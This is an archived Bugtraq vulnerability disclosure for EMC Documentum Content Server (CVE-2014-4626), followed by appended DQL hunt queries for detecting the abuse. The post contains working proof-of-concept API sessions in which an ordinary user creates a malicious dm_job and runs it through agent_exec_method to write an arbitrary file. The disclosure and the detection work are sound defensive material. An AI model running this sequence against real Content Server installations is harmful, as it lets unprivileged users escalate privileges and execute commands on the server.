Bugtraq mailing list archives
Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects
From: <andrew () panfilov tel>
Date: Wed, 1 Jul 2015 16:39:10 +1000
Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

In April 2014 I discovered a vulnerability in EMC Documentum Content Server which allows an authenticated user to elevate privileges, hijack the Content Server filesystem or execute arbitrary commands by creating malicious dm_job objects (for a detailed description see VRF#HUFU6FNP.txt and VRF#HUFV0UZN.txt).

In October 2014 the vendor announced ESA-2014-105, which claimed that the vulnerability had been remediated. In November 2014 the fix was contested (there was a significant delay after ESA-2014-105 because the vendor constantly fails to provide the status of reported vulnerabilities) by providing a PoC similar to the one described in VRF#HUGC34JH.txt; the description provided to CERT/CC (another CNA was chosen because the vendor fails to communicate) was:

=================================8<================================
The problem is that a non-privileged user is able to create dm_job objects and execute the corresponding docbase methods (some examples of "malicious" methods are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN); the word "create" here means any sequence of commands which results in the existence of a dm_job object. The PoC in VRF#HUFU6FNP describes an attack on the scheduler - the scheduler does not schedule jobs unless they are owned by a superuser, so the command sequence in that case was: "create dm_job and update dm_job". EMC thinks that they have fixed the vulnerability, but they just fixed the sequence given in the PoC; another sequence is "create dm_sysobject, update dm_sysobject & change dm_sysobject" - see VRF#HUGC34JH, it's an already known attack. Also, I could provide a third PoC related to this report, but I do not think that would be useful for EMC.
=================================>8================================

The current status of CVE-2014-4626 is obscure; the last public status can be found in the CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340):

=================================8<================================
The new exploit is being tracked under PSRC-2494. This is targeted for Q1 2015 (March patch).
=================================>8================================

Though the latest builds of EMC Documentum Content Server successfully pass the PoCs described previously:

=================================8<================================
API> create,c,dm_job
...
08024be980006902
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error:  "Must have system admin privileges or superuser privileges to change the owner_name to 'dmadmin'."
API> create,c,dm_sysobject
...
08024be980006904
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
OK
API> ?,c,change dm_sysobject object to dm_job where r_object_id='08024be980006904'
[DM_QUERY_F_CHANGE_SAVE]fatal:  "CHANGE: An unexpected save error has occurred for object 08024be980006904."
[DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error:  "The current user (test) needs to have superuser or sysadmin privilege to create or save or destroy objects of type (dm_job)."
=================================>8================================

the vulnerability remains unfixed. Below is another PoC (the job engine in Documentum consists of two parts: scheduler and executor; the previous attacks were designed to exploit the vulnerability in the scheduler, this one demonstrates how to exploit the vulnerability in the job executor):

=================================8<================================
API> create,c,dm_job
...
08024be98000690e
API> set,c,l,object_name
SET> malicious job
...
OK
API> set,c,l,inactivate_after_failure
SET> 0
...
OK
API> set,c,l,max_iterations
SET> 0
...
OK
API> set,c,l,method_name
SET> dm_file_writer
...
OK
API> set,c,l,pass_standard_arguments
SET> 0
...
OK
API> set,c,l,run_interval
SET> 1
...
OK
API> set,c,l,run_mode
SET> 1
...
OK
API> set,c,l,run_now
SET> 1
...
OK
API> set,c,l,is_inactive
SET> 0
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> append,c,l,method_arguments
SET> /tmp/test.txt
...
OK
API> append,c,l,method_arguments
SET> agentexec_has_vulnerability
...
OK
API> append,c,l,method_arguments
SET> CREATE
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,agent_exec_method,ARGUMENTS,S,' -docbase_name DCTM_DEV.DCTM_DEV -docbase_owner dmadmin -job_id 08024be98000690e -log_directory /u01/documentum/cs/dba/log -docbase_id 150505 -trace_level 10 '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 91436
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 60
  app_server_host_name            :
  app_server_port                 : 0
  app_server_uri                  :
  error_message                   :

SYSTEM ATTRIBUTES

APPLICATION ATTRIBUTES

INTERNAL ATTRIBUTES

API> Bye
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
=================================>8================================

--
Regards,
Andrey B. Panfilov
Attachments:
VRF#HUFU6FNP.txt
VRF#HUFV0UZN.txt
VRF#HUGC34JH.txt
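The DQL hunt query below is an added example and is not part of Panfilov's post, of the attached PoCs or of any EMC fix. It looks for the artifact the executor PoC above leaves behind: a dm_job object created and therefore owned by an ordinary user (in the PoC, the user "test"), and any dm_job that calls dm_file_writer, the method the PoC pointed at /tmp/test.txt. The join on dm_user.user_name and the assumption that dm_user.user_privileges is a bit mask in which 8 marks sysadmin and 16 marks superuser (so any value below 8 carries neither) are taken from the standard Documentum schema and should be confirmed against your Content Server version; a job listed here needs manual review of its method_name and method_arguments, it is not by itself proof of abuse.

```sql
-- Added hunt query (DQL, not the post's own code). Run as a sysadmin or
-- superuser in idql or the DQL editor. DQL has no comment syntax, so drop the
-- "--" lines before pasting, and in idql terminate each statement with "go".

-- 1. dm_job objects whose owner is not a sysadmin or superuser.
--    Assumption: user_privileges bit 8 = sysadmin, bit 16 = superuser,
--    so owners with user_privileges >= 8 hold at least one of them and
--    everything else (including owner names that resolve to no dm_user)
--    is reported.
select r_object_id, object_name, owner_name, r_creator_name,
       method_name, run_now, is_inactive, world_permit, r_modify_date
  from dm_job
 where owner_name not in (select user_name
                            from dm_user
                           where user_privileges >= 8)
 order by r_modify_date desc

-- 2. Any job, whatever its owner, that invokes dm_file_writer (the method
--    used in the executor PoC), with the repeating method_arguments
--    attribute flattened one value per row via ENABLE(ROW_BASED).
select r_object_id, object_name, owner_name, r_creator_name,
       method_arguments, r_modify_date
  from dm_job
 where method_name = 'dm_file_writer'
 enable (row_based)
```

The first query is the general check implied by the post: the scheduler refuses jobs not owned by a superuser, so any dm_job owned by a lesser account exists only because the create/save restriction was bypassed, whether through the change-object route contested in November 2014 or a sequence not shown. The second is specific to the method the PoC used; extend the method_name filter with whatever other methods your site treats as privileged. Neither query detects the DO_METHOD call itself, which is what runs the job through agent_exec_method; for that, Content Server method tracing or the method server log at the configured log_directory is the place to look.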